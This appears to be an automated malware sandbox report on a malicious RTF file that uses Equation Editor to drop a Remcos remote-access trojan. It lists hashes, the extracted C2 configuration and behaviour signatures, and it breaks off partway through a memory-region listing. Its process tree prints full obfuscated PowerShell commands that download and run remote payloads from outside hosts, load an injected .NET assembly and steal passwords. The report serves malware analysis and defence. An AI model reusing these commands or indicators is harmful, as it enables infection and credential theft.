Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2025 16:06

General

  • Target

    sheisveryinterestingirlsheisverybestfirlformebestthingsshedoing_____undergoodthingsarehappeningevnte.rtf

  • Size

    243KB

  • MD5

    8e128f75977895f5e8767935ab792e5d

  • SHA1

    6820bb80d79a418adecf1db8d7bf1fddf054fc4e

  • SHA256

    2b95f8d7e77d68b4fc2f40b1c42a9da731bd9812a60c36162019063f8af24978

  • SHA512

    d579f38026e4c10b500dabea06f1965b4446ddd0a67b01f51a813b5963173af876e557c0dffe00c667be50a47fd02635062f3924fadd08f5455787c4e5651a3f

  • SSDEEP

    3072:GBU+1XqRJXufoJVSCOum9tkU5/YATIiQvyUS:tdJXuQJwn5gDiQvyUS

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

abeangana.duckdns.org:1121

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-B9B8CE

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 12 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Detected phishing page
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sheisveryinterestingirlsheisverybestfirlformebestthingsshedoing_____undergoodthingsarehappeningevnte.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2336
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2604
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\ccukissmeplsgivrmebest.hta"
        2⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2952
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" "/c PowerShELL -eX bYpass -nOp -W 1 -C dEvIceCREDeNtiALDEpLoYMeNt.eXe ; IEX($(ieX('[SysTem.TEXT.ENCOdINg]'+[CHaR]58+[CHAR]0x3a+'UTF8.gEtsTRING([sYSteM.convert]'+[ChAr]0X3a+[cHAr]58+'fROmbaSe64STRING('+[chAr]34+'JDFBeDhTWjJQTDEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSREVmSU5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNpd0dacUh1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDd01TSG4sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0NEZEVXcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVlUVHFEbnRtIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtRSnd1cFpDaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxQXg4U1oyUEwxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ1LjIzOS4yOS4xMi8yMjUvbmljZWdpcmxmcm5kZ2l2ZW5tZWJlc3R0aGluZ3Nmb3JnLmdJRiIsIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMiLDAsMCk7c1RBUlQtc2xFZXAoMyk7aU52b0tFLUV4cFJFc3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMi'+[CHAr]0X22+'))')))"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            PowerShELL -eX bYpass -nOp -W 1 -C dEvIceCREDeNtiALDEpLoYMeNt.eXe ; IEX($(ieX('[SysTem.TEXT.ENCOdINg]'+[CHaR]58+[CHAR]0x3a+'UTF8.gEtsTRING([sYSteM.convert]'+[ChAr]0X3a+[cHAr]58+'fROmbaSe64STRING('+[chAr]34+'JDFBeDhTWjJQTDEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSREVmSU5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNpd0dacUh1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDd01TSG4sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0NEZEVXcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVlUVHFEbnRtIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtRSnd1cFpDaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxQXg4U1oyUEwxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ1LjIzOS4yOS4xMi8yMjUvbmljZWdpcmxmcm5kZ2l2ZW5tZWJlc3R0aGluZ3Nmb3JnLmdJRiIsIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMiLDAsMCk7c1RBUlQtc2xFZXAoMyk7aU52b0tFLUV4cFJFc3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMi'+[CHAr]0X22+'))')))"
            4⤵
            • Blocklisted process makes network request
            • Evasion via Device Credential Deployment
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1096
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2lbocpg5.cmdline"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2180
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD75C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD75B.tmp"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1364
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlfrndgivenmebesnicegirlfrndgivenmebes.vbs"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1368
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAGEAeAB3AHUAYQA2ADMAeQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA3ADUANAA0ADAANgAzAC8AMQBuAGUAdwBfAGkAbQBhAGcAZQBfAG4AagBwADAAeQByAC4AagBwAGcAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAdABhAGUAcgBnAGgAdABpAHcAcwBnAG4AaQBoAHQAZABvAG8AZwB0AHMAZQBiAC8ANQAyADIALwAyADEALgA5ADIALgA5ADMAMgAuADUANAAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2372
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  7⤵
                    PID:592
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    7⤵
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of WriteProcessMemory
                    PID:2740
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\uznrrmfpnjdelmsfbwv"
                      8⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2680
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ebsjsexjbsvinthjshizgi"
                      8⤵
                        PID:2492
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ebsjsexjbsvinthjshizgi"
                        8⤵
                        • Accesses Microsoft Outlook accounts
                        • System Location Discovery: System Language Discovery
                        PID:2328
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ovxctxikxannyzdnbrvtrnqoxd"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2700

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          6c6e38ec3d63eacf9fac1f8b1dbe150f

          SHA1

          5f7105c76f54582afe867a631d74580da6ce4f7e

          SHA256

          e53cc15bfc6bf7875b697d38d8b65cb7c0e3079fb34a0c5c6bb31a0f7f4f0eb4

          SHA512

          46016088c5de99fb77e8ff9502ba3941c2c6cd6f5aff68c417a322ede6a833c440384a4f3ecd359600ff67eedf1c1abeffac6547f397a189ae2018c6b5a4326d

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          483cfadc07d3ec63a061a606d56bb365

          SHA1

          11f84767a06cbee6b75b100b812ec82fc9817c98

          SHA256

          9623c40ea51329409db6344369f41bfd63d460a726d0b10ee1c6b892290042bb

          SHA512

          e78d6929055375505e4f989edaf0f599cfbe9db842bb19121b52cb2b5cce90aec7d2187805cb25fbfc583aed59b37238df9b87b238b38df92ff5b6ed50abbf55

        • C:\Users\Admin\AppData\Local\Temp\2lbocpg5.dll

          Filesize

          3KB

          MD5

          d02f490516a1ab5777d47524993768e5

          SHA1

          5edbde6966e03027116d96d6dd305e594c021ab9

          SHA256

          09e38c63a0c1a30ae118319beec58305534c6bb1738f25ee126fc987461c4bb9

          SHA512

          c994f42441563225baa361e59a9a5e762929dba4b7a4f8a8a8a2a0a0acd2494f1f0db6364cf5fa345b47bee1e94c3e58369cb4ad42d8712fd8895c208b194b96

        • C:\Users\Admin\AppData\Local\Temp\2lbocpg5.pdb

          Filesize

          7KB

          MD5

          032d976d0d429e210dc2ca3bb00b235e

          SHA1

          04cc0acdcb44b083308df7a0a5dcc623452f5e2f

          SHA256

          6956b8ebf6e5574565f7a2ac4d65fd674854cb0bef8e1a8406242fdac4375e1a

          SHA512

          9441651a730f8a4f5d3dd3dc90b3300e002daea09daf0f96b0d8a8b79b230f5ae0615787cad9016a873878c59ac8acbf7eb12c1a7d8295b51791e79792873a37

        • C:\Users\Admin\AppData\Local\Temp\CabC40C.tmp

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\Local\Temp\RESD75C.tmp

          Filesize

          1KB

          MD5

          2e95e8a7111b3f076cf925c03e7f496f

          SHA1

          dfb1bb319d27311ebe88081754b281a1f147afc6

          SHA256

          9997862337ea87791b8ea2692ea106ec6075240605bc433d2b42388927be7dcd

          SHA512

          940576e5d83768121c2fefde0109239167e2bb3d93e328e652cd01dd9c9ec20f0e8bde3c1083b09c37e8d7a1f1635dcf049de1e0668d3117a801192adca0b95d

        • C:\Users\Admin\AppData\Local\Temp\TarC43E.tmp

          Filesize

          181KB

          MD5

          4ea6026cf93ec6338144661bf1202cd1

          SHA1

          a1dec9044f750ad887935a01430bf49322fbdcb7

          SHA256

          8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

          SHA512

          6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

        • C:\Users\Admin\AppData\Local\Temp\uznrrmfpnjdelmsfbwv

          Filesize

          2B

          MD5

          f3b25701fe362ec84616a93a45ce9998

          SHA1

          d62636d8caec13f04e28442a0a6fa1afeb024bbb

          SHA256

          b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

          SHA512

          98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

          Filesize

          7KB

          MD5

          f523957a49c7cfb4df12f6c6151bf5a4

          SHA1

          470d00276de3a601747f6f752fb90308bccb25f2

          SHA256

          7515666c0c694a716eaa85a36269a7af69b4ce06d627a2393bff4e9386cd94c7

          SHA512

          ba688ee22c8df2ac5c4a2ccaba0cc7087c41c423337dff19fc2d85080a3cd5620c94cc49ecd4b82325607fa6d5edc7feb4674de213728ad3d7df7fc5ddfc0944

        • C:\Users\Admin\AppData\Roaming\ccukissmeplsgivrmebest.hta

          Filesize

          1.2MB

          MD5

          24d95803236fde4ee8ebfe4671dc28fe

          SHA1

          677e9c8b79a59b4fa3c8eab8fd318ae31dcd5d95

          SHA256

          986b693f564b364a2f69261f1f825d6a26afec8db9a3aa46fd2a964e45dc2a1c

          SHA512

          272adc89c2eedbfd065e3fa54edcb27211db44b998f3e5479cc53c6954c0b37db16e6d2eac0977c040068da07da651f8d9adc440d97e65bbdcb53afb0c4670a0

        • C:\Users\Admin\AppData\Roaming\nicegirlfrndgivenmebesnicegirlfrndgivenmebes.vbs

          Filesize

          205KB

          MD5

          0e3b19cc6060bed0436e01fe8bc04c44

          SHA1

          8b99c60c35d7650ed451e3996bcccb7e9f51b7cf

          SHA256

          35315b1e950898c156611a9074ea43debd10d09098b855e9bfba76eef6ec3d17

          SHA512

          ad3267ee13123bebd28cee00cb2e128f0bf6213520378b5a45aa9d31b858f140612e2e6aee5d62be3a187af7c004de10ae1f0930e8133dc71c93f011fbde29e2

        • \??\c:\Users\Admin\AppData\Local\Temp\2lbocpg5.0.cs

          Filesize

          486B

          MD5

          3b886b3aeeb8599b37fc0be4fe6ae9d8

          SHA1

          b6d0a2488bd50c1b7f96cae0e91bdc3a083a5a7e

          SHA256

          b1dece05fc9ac39567b6cd75ae891827264b7d3606d5996807f1e88840e2c33e

          SHA512

          ecc3d89869a074e00b7dbb0c3fbe07fd534cb2a100ef6280ffc3f02f66ace38526746761b216061e5d7d519f0b685a1b89a2f51c4e24d8ee900b77b949268458

        • \??\c:\Users\Admin\AppData\Local\Temp\2lbocpg5.cmdline

          Filesize

          309B

          MD5

          5dff01ab2719ef58d52bb5b865749468

          SHA1

          effef404e75ac5585a3595dfac1a0e250a858e7f

          SHA256

          f22c067403bcc7d7e870b95d240b7a1dbb22052f75411652a4e410b53d90d037

          SHA512

          1523f4fa19b331d1d5bbe19ae0bf4f80a0b74f5eefcb0176e3a1261c5299170c8c42f2a3a2f91a2ead496f2b8f94103004ae8260e07b77d568e576c6640c93ed

        • \??\c:\Users\Admin\AppData\Local\Temp\CSCD75B.tmp

          Filesize

          652B

          MD5

          507722fffa8496a0ad97eb096f3ff4ec

          SHA1

          89258337f633a5033812c76d0161b4893a765449

          SHA256

          f6a3f923d468dd11fee9f255ebcb11577c62974431ac494a6e8a4bacb0e915de

          SHA512

          78fbbe916c9e6f99938dbd83dbca6f03ad4ccc3c73a0ab7642cd8cf48ab067efdc9568152c268ec0b5df69fd685fa2c9a7e017b7cc873d4973a1f8e422cb59f4

        • memory/2328-247-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/2328-245-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/2328-240-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

          Filesize

          4KB

        • memory/2328-241-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/2372-177-0x00000000057A0000-0x00000000057F8000-memory.dmp

          Filesize

          352KB

        • memory/2372-178-0x0000000006390000-0x00000000063DF000-memory.dmp

          Filesize

          316KB

        • memory/2380-165-0x0000000070E2D000-0x0000000070E38000-memory.dmp

          Filesize

          44KB

        • memory/2380-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

        • memory/2380-2-0x0000000070E2D000-0x0000000070E38000-memory.dmp

          Filesize

          44KB

        • memory/2380-0-0x000000002FAC1000-0x000000002FAC2000-memory.dmp

          Filesize

          4KB

        • memory/2680-248-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/2680-239-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/2680-242-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/2700-244-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/2700-249-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/2700-246-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/2740-227-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-218-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-234-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-236-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-237-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-222-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-232-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-231-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-229-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-224-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-226-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

          Filesize

          4KB

        • memory/2740-228-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-216-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-233-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-220-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-214-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-255-0x0000000010000000-0x0000000010019000-memory.dmp

          Filesize

          100KB

        • memory/2740-258-0x0000000010000000-0x0000000010019000-memory.dmp

          Filesize

          100KB

        • memory/2740-259-0x0000000010000000-0x0000000010019000-memory.dmp

          Filesize

          100KB

        • memory/2740-260-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-261-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-262-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-263-0x0000000000400000-0x0000000000480000-memory.dmp

          Filesize

          512KB

        • memory/2740-264-0x0000000000400000-0x0000000000480000-memory.dmp

